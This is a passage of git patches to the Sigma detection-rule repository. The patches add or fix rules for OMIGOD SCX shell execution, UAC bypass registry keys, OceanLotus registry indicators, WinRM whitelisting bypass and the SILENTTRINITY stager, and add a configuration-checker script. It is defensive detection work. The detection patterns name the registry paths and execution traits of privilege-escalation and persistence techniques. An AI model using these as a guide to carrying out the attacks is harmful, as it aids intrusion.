https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us author: Tobias Michalski date: 2021/06/09 +modified: 2021/09/17 tags: - attack.persistence - attack.t1112 @@ -23,7 +24,7 @@ detection: TargetObject|contains: - 'Calendar' - 'Inbox' - condition: selection1 and 1 of selection2 + condition: selection1 and selection2 fields: - Details falsepositives: From 6e4edfdf2087b1259f36cb1d24da41c4a2b789b6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 17 Sep 2021 09:11:53 +0200 Subject: [PATCH 0962/1367] fix detection --- .../registry_event/sysmon_susp_mic_cam_access.yml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/rules/windows/registry_event/sysmon_susp_mic_cam_access.yml b/rules/windows/registry_event/sysmon_susp_mic_cam_access.yml index f8ffaeb6..77400edb 100644 --- a/rules/windows/registry_event/sysmon_susp_mic_cam_access.yml +++ b/rules/windows/registry_event/sysmon_susp_mic_cam_access.yml @@ -3,6 +3,7 @@ id: 62120148-6b7a-42be-8b91-271c04e281a3 description: Detects Processes accessing the camera and microphone from suspicious folder author: Den Iuzvyk date: 2020/06/07 +modified: 2021/09/17 references: - https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072 tags: @@ -23,12 +24,12 @@ detection: - webcam selection_3: TargetObject|contains: - - '#C:#Windows#Temp#' - - '#C:#$Recycle.bin#' - - '#C:#Temp#' - - '#C:#Users#Public#' - - '#C:#Users#Default#' - - '#C:#Users#Desktop#' + - ':#Windows#Temp#' + - ':#$Recycle.bin#' + - ':#Temp#' + - ':#Users#Public#' + - ':#Users#Default#' + - ':#Users#Desktop#' condition: all of selection_* falsepositives: - Unlikely, there could be conferencing software running from a Temp folder accessing the devices From 7618cf4672c106a4e78550cb460a38bfb3d91e1b Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 17 Sep 2021 04:23:11 -0400 Subject: [PATCH 0963/1367] Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell --- ..._scx_runasprovider_executeshellcommand.yml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml diff --git a/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml new file mode 100644 index 00000000..d9f579cf --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml @@ -0,0 +1,32 @@ +title: OMIGOD SCX RunAsProvider ExecuteShellCommand +id: 045b5f9c-49f7-4419-a236-9854fb3c827a +description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. +status: experimental +date: 2021/09/17 +modified: 2019/09/17 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.t1068 + - attack.t1190 + - attack.t1203 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + SYSCALL: 'execve' + uid: '0' + cwd: '/var/opt/microsoft/scx/tmp' + comm: 'sh' + condition: selection +falsepositives: + - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. +level: Medium + From c17104b2eb8dcc4be6da7f0aa1e9621f5dc53c1f Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 17 Sep 2021 04:30:17 -0400 Subject: [PATCH 0964/1367] updated level to high --- .../lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml index d9f579cf..82f0a63e 100644 --- a/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml +++ b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml @@ -28,5 +28,5 @@ detection: condition: selection falsepositives: - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. -level: Medium +level: high From 260578dcebbbe23ff5f4634b9ed8f43890df4fe8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 17 Sep 2021 14:29:19 +0200 Subject: [PATCH 0965/1367] fix: wrong modified field --- .../lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml index 82f0a63e..d98c1a54 100644 --- a/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml +++ b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml @@ -3,7 +3,6 @@ id: 045b5f9c-49f7-4419-a236-9854fb3c827a description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. status: experimental date: 2021/09/17 -modified: 2019/09/17 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.privilege_escalation From a1222c7716cf58fba03e10278d7a80674f674e33 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 17 Sep 2021 19:50:30 +0200 Subject: [PATCH 0966/1367] Update sysmon_apt_oceanlotus_registry --- .../sysmon_apt_oceanlotus_registry.yml | 35 ++++++++++--------- 1 file changed, 19 insertions(+), 16 deletions(-) diff --git a/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml b/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml index d726d245..cd6eefdb 100755 --- a/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml +++ b/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml @@ -4,39 +4,42 @@ status: experimental description: Detects registry keys created in OceanLotus (also known as APT32) attacks references: - https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/ + - https://github.com/eset/malware-ioc/tree/master/oceanlotus tags: - attack.defense_evasion - attack.t1112 author: megan201296, Jonhnathan Ribeiro date: 2019/04/14 -modified: 2021/09/13 +modified: 2021/09/17 logsource: category: registry_event product: windows detection: - selection: - TargetObject: - - 'HKCU\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model' + ioc_1: + TargetObject: 'HKCU\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model' + ioc_2: + TargetObject|startswith: + - HKCU\SOFTWARE\App\ + - HKLM\SOFTWARE\App\ + TargetObject|contains: + - AppXbf13d4ea2945444d8b13e2121cb6b663\ + - AppX70162486c7554f7f80f481985d67586d\ + - AppX37cc7fdccd644b4f85f4b22d5a3f105a\ TargetObject|endswith: - # covers HKU\* and HKLM.. - - '\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\Application' - - '\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\DefaultIcon' - - '\SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\Application' - - '\SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\DefaultIcon' - - '\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\Application' - - '\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\DefaultIcon' + - Application + - DefaultIcon selection2: TargetObject|startswith: - 'HKCU\' TargetObject|contains: # HKCU\SOFTWARE\Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\ - - '_Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\' + - 'Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\' # HKCU\SOFTWARE\Classes\AppX3bbba44c6cae4d9695755183472171e2\ - - '_Classes\AppX3bbba44c6cae4d9695755183472171e2\' + - 'Classes\AppX3bbba44c6cae4d9695755183472171e2\' # HKCU\SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\ - - '_Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\' - - '_Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model' - condition: selection or selection2 + - 'Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\' + - 'Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model' + condition: ioc_1 or ioc_2 or selection2 falsepositives: - Unknown level: critical From d22382d0b998fc0614dde3af0fe3f1f397853aa4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 17 Sep 2021 19:52:40 +0200 Subject: [PATCH 0967/1367] fix detection --- .../sysmon_registry_persistence_key_linking.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml b/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml index 34447d11..2e2d8bef 100755 --- a/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml +++ b/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml @@ -6,7 +6,7 @@ references: - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ author: Kutepov Anton, oscd.community date: 2019/10/23 -modified: 2019/11/07 +modified: 2021/09/17 tags: - attack.persistence - attack.t1122 # an old one @@ -19,7 +19,7 @@ detection: EventType: 'CreateKey' # don't want DeleteKey events TargetObject|contains|all: - 'HKU\' - - '_Classes\CLSID\' + - 'Classes\CLSID\' - '\TreatAs' condition: selection falsepositives: From 509a4c2822ad7b8e724a4d5c5c04bc752b43b112 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 17 Sep 2021 19:54:50 +0200 Subject: [PATCH 0968/1367] fix detection --- rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml b/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml index f05853b8..01c56658 100755 --- a/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml @@ -7,17 +7,15 @@ references: - https://github.com/hfiref0x/UACME author: Omer Yampel, Christian Burkard date: 2017/03/17 -modified: 2021/08/31 +modified: 2021/09/17 logsource: category: registry_event product: windows detection: selection1: - # usrclass.dat is mounted on HKU\USERSID_Classes\... - TargetObject|startswith: 'HKU\' - TargetObject|endswith: '_Classes\exefile\shell\runas\command\isolatedCommand' + TargetObject|endswith: Software\Classes\exefile\shell\runas\command\isolatedCommand selection2: - TargetObject|endswith: '-1???_Classes\Folder\shell\open\command\SymbolicLinkValue' + TargetObject|endswith: Software\Classes\Folder\shell\open\command\SymbolicLinkValue Details|contains: '-1???\Software\Classes\' condition: 1 of selection* tags: From 81bf864d94379ec2ae2ac28593d199e5fd8f3a79 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 17 Sep 2021 19:56:26 +0200 Subject: [PATCH 0969/1367] fix detection --- .../registry_event/sysmon_uac_bypass_shell_open.yml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml index 032e1146..9b2cf67a 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -3,6 +3,7 @@ id: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 description: Detects the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) author: Christian Burkard date: 2021/08/30 +modified: 2021/09/17 status: experimental references: - https://github.com/hfiref0x/UACME @@ -17,14 +18,14 @@ logsource: product: windows detection: selection1: - TargetObject|endswith: '_Classes\ms-settings\shell\open\command\SymbolicLinkValue' + TargetObject|endswith: 'Classes\ms-settings\shell\open\command\SymbolicLinkValue' Details|contains: '\Software\Classes\{' selection2: - TargetObject|endswith: '_Classes\ms-settings\shell\open\command\DelegateExecute' + TargetObject|endswith: 'Classes\ms-settings\shell\open\command\DelegateExecute' selection3: TargetObject|endswith: - - '_Classes\ms-settings\shell\open\command\(Default)' - - '_Classes\exefile\shell\open\command\(Default)' + - 'Classes\ms-settings\shell\open\command\(Default)' + - 'Classes\exefile\shell\open\command\(Default)' filter_sel3: Details: '(Empty)' condition: selection1 or selection2 or (selection3 and not filter_sel3) From 407289d30006146c861188f69ceb533ad2ce0dc6 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Sat, 18 Sep 2021 03:50:37 -0400 Subject: [PATCH 0970/1367] Rule to detect the execution of a script via SCX RunAsprovider ExecuteScript --- ...omigod_scx_runasprovider_executescript.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml diff --git a/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml new file mode 100644 index 00000000..a760be6d --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml @@ -0,0 +1,33 @@ +title: OMIGOD SCX RunAsProvider ExecuteScript +id: 865c10a6-9541-4d11-9f45-9a3484e23b0a +description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. +status: experimental +date: 2021/09/18 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.t1068 + - attack.t1190 + - attack.t1203 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/ + - https://github.com/Azure/Azure-Sentinel/pull/3071/files +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + SYSCALL: 'execve' + uid: '0' + cwd: '/var/opt/microsoft/scx/tmp' + cmdline|contains: /etc/opt/microsoft/scx/conf/tmpdir/scx + comm: 'sh' + condition: selection +falsepositives: + - Legitimate use of SCX RunAsProvider ExecuteScript. +level: high + From 5081c210b7bc537121bfaf5c134392c87257c654 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 18 Sep 2021 15:51:05 +0200 Subject: [PATCH 0971/1367] add simple script --- tools/sigma/sigma_configurations_check.py | 56 +++++++++++++++++++++++ tools/sigma_configurations_check | 5 ++ 2 files changed, 61 insertions(+) create mode 100644 tools/sigma/sigma_configurations_check.py create mode 100644 tools/sigma_configurations_check diff --git a/tools/sigma/sigma_configurations_check.py b/tools/sigma/sigma_configurations_check.py new file mode 100644 index 00000000..6ab6924e --- /dev/null +++ b/tools/sigma/sigma_configurations_check.py @@ -0,0 +1,56 @@ +#!/usr/bin/env python3 +# A simple Sigma Configurations checker +# Copyright frack113 + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. + +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . + +import sigma.backends.discovery as backends +import ruamel.yaml +from pathlib import Path + +def main(): + list_backend =[] + for backend in sorted(backends.getBackendList(), key=lambda backend: backend.identifier): + list_backend.append(backend.identifier) + + print(f"Valid backend name are {list_backend}") + print('result tab:') + print('|Name file|Backend|check') + print('|---|---|---') + + valid = 0 + empty = 0 + faulty = 0 + yml_files =Path('config/').glob("*.yml") + for yml in yml_files: + with yml.open("r",encoding="UTF-8") as f: + data = ruamel.yaml.load(f,Loader=ruamel.yaml.RoundTripLoader) + if 'backends' in data: + for backend in data['backends']: + if backend in list_backend: + print(f"|{yml.name:45} | {backend:30} | OK ") + valid += 1 + else: + print(f"|{yml.name:45} | {backend:30} | NOK") + faulty += 1 + else: + msg = "no backend set" + print(f"|{yml.name:45} | {msg:30} | - ") + empty += 1 + + print('Summary') + print(f'Valid : {valid} Invalid : {faulty} No Backend : {empty}') + +if __name__ == "__main__": + main() diff --git a/tools/sigma_configurations_check b/tools/sigma_configurations_check new file mode 100644 index 00000000..871d3713 --- /dev/null +++ b/tools/sigma_configurations_check @@ -0,0 +1,5 @@ +#!/usr/bin/env python3 + +from sigma.sigma_configurations_check import main + +main() From 365db5abbc371d5acc186aa7db21d08dd704879a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 18 Sep 2021 15:54:08 +0200 Subject: [PATCH 0972/1367] fix bad elasticsearch-rule --- tools/config/ecs-auditd.yml | 1 - tools/config/ecs-dns.yml | 2 +- tools/config/ecs-filebeat.yml | 1 - tools/config/ecs-zeek-corelight.yml | 2 +- tools/config/ecs-zeek-elastic-beats-implementation.yml | 1 - tools/config/logstash-zeek-default-json.yml | 2 +- tools/config/winlogbeat-modules-enabled.yml | 1 - 7 files changed, 3 insertions(+), 7 deletions(-) diff --git a/tools/config/ecs-auditd.yml b/tools/config/ecs-auditd.yml index c5c9a0cc..00c1c939 100644 --- a/tools/config/ecs-auditd.yml +++ b/tools/config/ecs-auditd.yml @@ -11,7 +11,6 @@ backends: - xpack-watcher - elastalert - elastalert-dsl - - elasticsearch-rule - ee-outliers logsources: diff --git a/tools/config/ecs-dns.yml b/tools/config/ecs-dns.yml index aaa8e636..c0c1f53b 100644 --- a/tools/config/ecs-dns.yml +++ b/tools/config/ecs-dns.yml @@ -3,7 +3,7 @@ order: 20 backends: - es-qs - es-dsl - - elasticsearch-rule + - es-rule - kibana - kibana-ndjson - xpack-watcher diff --git a/tools/config/ecs-filebeat.yml b/tools/config/ecs-filebeat.yml index dd85cc7a..17d9990d 100644 --- a/tools/config/ecs-filebeat.yml +++ b/tools/config/ecs-filebeat.yml @@ -11,7 +11,6 @@ backends: - xpack-watcher - elastalert - elastalert-dsl - - elasticsearch-rule - ee-outliers defaultindex: filebeat-* diff --git a/tools/config/ecs-zeek-corelight.yml b/tools/config/ecs-zeek-corelight.yml index 5bf7dab3..8fd59d94 100644 --- a/tools/config/ecs-zeek-corelight.yml +++ b/tools/config/ecs-zeek-corelight.yml @@ -5,7 +5,7 @@ backends: - es-qs - corelight_es-qs - es-dsl - - elasticsearch-rule + - es-rule - corelight_elasticsearch-rule - kibana - kibana-ndjson diff --git a/tools/config/ecs-zeek-elastic-beats-implementation.yml b/tools/config/ecs-zeek-elastic-beats-implementation.yml index c79b4e89..9aeae994 100644 --- a/tools/config/ecs-zeek-elastic-beats-implementation.yml +++ b/tools/config/ecs-zeek-elastic-beats-implementation.yml @@ -4,7 +4,6 @@ backends: - es-qs - es-dsl - es-rule - - elasticsearch-rule - kibana - kibana-ndjson - xpack-watcher diff --git a/tools/config/logstash-zeek-default-json.yml b/tools/config/logstash-zeek-default-json.yml index e6b1d14e..c4332f32 100644 --- a/tools/config/logstash-zeek-default-json.yml +++ b/tools/config/logstash-zeek-default-json.yml @@ -3,7 +3,7 @@ order: 20 backends: - es-qs - es-dsl - - elasticsearch-rule + - es-rule - kibana - kibana-ndjson - xpack-watcher diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index e43f5ef5..d46dd205 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -11,7 +11,6 @@ backends: - xpack-watcher - elastalert - elastalert-dsl - - elasticsearch-rule - ee-outliers logsources: windows: From 72d301ba206b8de2a1efe4cd27f9be7ae29a3022 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 18 Sep 2021 15:55:01 +0200 Subject: [PATCH 0973/1367] remove bad cb --- tools/config/carbon-black-eedr.yml | 1 - tools/config/carbon-black.yml | 1 - 2 files changed, 2 deletions(-) diff --git a/tools/config/carbon-black-eedr.yml b/tools/config/carbon-black-eedr.yml index 0e7c4fff..ae17afb8 100644 --- a/tools/config/carbon-black-eedr.yml +++ b/tools/config/carbon-black-eedr.yml @@ -2,7 +2,6 @@ title: CarbonBlack Enterprise EDR order: 20 backends: - carbonblack - - cb fieldmappings: AccountName: - process_username diff --git a/tools/config/carbon-black.yml b/tools/config/carbon-black.yml index aaf7ae18..56e33f8e 100644 --- a/tools/config/carbon-black.yml +++ b/tools/config/carbon-black.yml @@ -2,7 +2,6 @@ title: CarbonBlack field mapping order: 20 backends: - carbonblack - - cb fieldmappings: AccountName: username CommandLine: cmdline From 88a59be69c2e8fbd00ef26762ee909b1ff012f04 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 18 Sep 2021 18:13:16 +0200 Subject: [PATCH 0974/1367] Add options and return error code --- tools/sigma/sigma_configurations_check.py | 85 ++++++++++++++++------- 1 file changed, 59 insertions(+), 26 deletions(-) diff --git a/tools/sigma/sigma_configurations_check.py b/tools/sigma/sigma_configurations_check.py index 6ab6924e..80d52d6b 100644 --- a/tools/sigma/sigma_configurations_check.py +++ b/tools/sigma/sigma_configurations_check.py @@ -18,39 +18,72 @@ import sigma.backends.discovery as backends import ruamel.yaml from pathlib import Path - +from argparse import ArgumentParser +import sys +import csv + def main(): + argparser = ArgumentParser(description="A simple Sigma Configurations checker") + argparser.add_argument("--verify", "-V", action="store_true", help="Verify if configuration file have valid backend name") + argparser.add_argument("--sumary", "-s", action="store_true", help="Give some information.") + argparser.add_argument("--error", "-e", action="store_true", help="Exit with error code 10 on verification failures.") + argparser.add_argument("--output", "-o", default=None, help="Output csv file") + args = argparser.parse_args() + + passed = True + list_backend =[] for backend in sorted(backends.getBackendList(), key=lambda backend: backend.identifier): list_backend.append(backend.identifier) - print(f"Valid backend name are {list_backend}") - print('result tab:') - print('|Name file|Backend|check') - print('|---|---|---') + if args.sumary: + print(f"Backend found :\n{list_backend}\n") - valid = 0 - empty = 0 - faulty = 0 - yml_files =Path('config/').glob("*.yml") - for yml in yml_files: - with yml.open("r",encoding="UTF-8") as f: - data = ruamel.yaml.load(f,Loader=ruamel.yaml.RoundTripLoader) - if 'backends' in data: - for backend in data['backends']: - if backend in list_backend: - print(f"|{yml.name:45} | {backend:30} | OK ") - valid += 1 - else: - print(f"|{yml.name:45} | {backend:30} | NOK") - faulty += 1 - else: - msg = "no backend set" - print(f"|{yml.name:45} | {msg:30} | - ") - empty += 1 + if args.verify: + csv_lst = [] + valid = 0 + empty = 0 + faulty = 0 + yml_files =Path('config/').glob("*.yml") + for yml in yml_files: + print(f"Check configurations file : {yml.name}") + with yml.open("r",encoding="UTF-8") as f: + data = ruamel.yaml.load(f,Loader=ruamel.yaml.RoundTripLoader) + if 'backends' in data: + for backend in data['backends']: + if backend in list_backend: + csv_lst.append([yml.name,backend,'OK']) + valid += 1 + else: + csv_lst.append([yml.name,backend,'NOK']) + faulty += 1 + passed = False + else: + csv_lst.append([yml.name,"no backends section",'-']) + empty += 1 + #passed = False + #Should not be but not sure + + if args.sumary: + print('-------') + print('Summary') + print(f'Valid backend name: {valid}\nInvalid backend name: {faulty}\nFile with no Backend: {empty}') + print('-------') - print('Summary') - print(f'Valid : {valid} Invalid : {faulty} No Backend : {empty}') + if args.output: + with open(args.output, 'w', newline='') as csvfile: + spamwriter = csv.writer(csvfile, delimiter=';',quotechar='|', quoting=csv.QUOTE_MINIMAL) + spamwriter.writerow(['Configurations Name','Backend Name','Result']) + for row in csv_lst: + spamwriter.writerow(row) + + if not passed: + print("**************************************") + print("Some Configurations file are not valid") + print("**************************************") + if args.error: + exit(10) + if __name__ == "__main__": main() From 7d000f2b1d39bfbb5e5305af69537d498077c42b Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 09:41:17 +0200 Subject: [PATCH 0975/1367] split win_susp_winrm_AWL_bypass.yml --- .../file_event_winrm_AWL_bypass.yml | 31 +++++++++++++++++++ .../win_susp_winrm_AWL_bypass.yml | 26 +++------------- 2 files changed, 36 insertions(+), 21 deletions(-) create mode 100644 rules/windows/file_event/file_event_winrm_AWL_bypass.yml diff --git a/rules/windows/file_event/file_event_winrm_AWL_bypass.yml b/rules/windows/file_event/file_event_winrm_AWL_bypass.yml new file mode 100644 index 00000000..572c319f --- /dev/null +++ b/rules/windows/file_event/file_event_winrm_AWL_bypass.yml @@ -0,0 +1,31 @@ +title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl +id: d353dac0-1b41-46c2-820c-d7d2561fc6ed +related: + - id: 074e0ded-6ced-4ebd-8b4d-53f55908119 + type: derived +description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) +status: experimental +references: + - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 +author: Julia Fomina, oscd.community +date: 2020/10/06 +modified: 2021/09/19 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + category: file_event +detection: + system_files: + TargetFilename|endswith: + - 'WsmPty.xsl' + - 'WsmTxt.xsl' + in_system_folder: + TargetFilename|startswith: + - 'C:\Windows\System32\' + - 'C:\Windows\SysWOW64\' + condition: system_files and not in_system_folder +level: medium +falsepositives: + - Unlikely \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml b/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml index fd21e69f..b9388c7e 100644 --- a/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml +++ b/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml @@ -1,19 +1,15 @@ -action: global title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl +id: 074e0ded-6ced-4ebd-8b4d-53f55908119d description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) status: experimental references: - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 author: Julia Fomina, oscd.community date: 2020/10/06 +modified: 2021/09/19 tags: - attack.defense_evasion - attack.t1216 -level: medium -falsepositives: - - Unlikely ---- -id: 074e0ded-6ced-4ebd-8b4d-53f55908119d logsource: category: process_creation product: windows @@ -31,18 +27,6 @@ detection: contains_winrm: CommandLine|contains: 'winrm' condition: contains_winrm and (contains_format_pretty_arg and not image_from_system_folder) ---- -id: d353dac0-1b41-46c2-820c-d7d2561fc6ed -logsource: - product: windows - category: file_event -detection: - system_files: - TargetFilename|endswith: - - 'WsmPty.xsl' - - 'WsmTxt.xsl' - in_system_folder: - TargetFilename|startswith: - - 'C:\Windows\System32\' - - 'C:\Windows\SysWOW64\' - condition: system_files and not in_system_folder +level: medium +falsepositives: + - Unlikely \ No newline at end of file From 416b0556b18cd61c78c12c91b6008c047335720d Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 10:02:05 +0200 Subject: [PATCH 0976/1367] split win_silenttrinity_stage_use.yml --- .../image_load_silenttrinity_stage_use.yml | 27 +++++++++++++++++++ .../win_silenttrinity_stage_use.yml | 19 +++++-------- 2 files changed, 33 insertions(+), 13 deletions(-) create mode 100644 rules/windows/image_load/image_load_silenttrinity_stage_use.yml diff --git a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml new file mode 100644 index 00000000..f65194e2 --- /dev/null +++ b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml @@ -0,0 +1,27 @@ +title: SILENTTRINITY Stager Execution +id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d +related: + - id: 03552375-cc2c-4883-bbe4-7958d5a980be + type: derived +status: experimental +description: Detects SILENTTRINITY stager use +references: + - https://github.com/byt3bl33d3r/SILENTTRINITY +author: Aleksey Potapov, oscd.community +date: 2019/10/22 +modified: 2021/09/19 +tags: + - attack.command_and_control +logsource: + category: image_load + product: windows +detection: + selection: + Description|contains: 'st2stager' + condition: selection +falsepositives: + - unknown +level: high + + + diff --git a/rules/windows/process_creation/win_silenttrinity_stage_use.yml b/rules/windows/process_creation/win_silenttrinity_stage_use.yml index d4699449..5a140744 100644 --- a/rules/windows/process_creation/win_silenttrinity_stage_use.yml +++ b/rules/windows/process_creation/win_silenttrinity_stage_use.yml @@ -1,28 +1,21 @@ -action: global title: SILENTTRINITY Stager 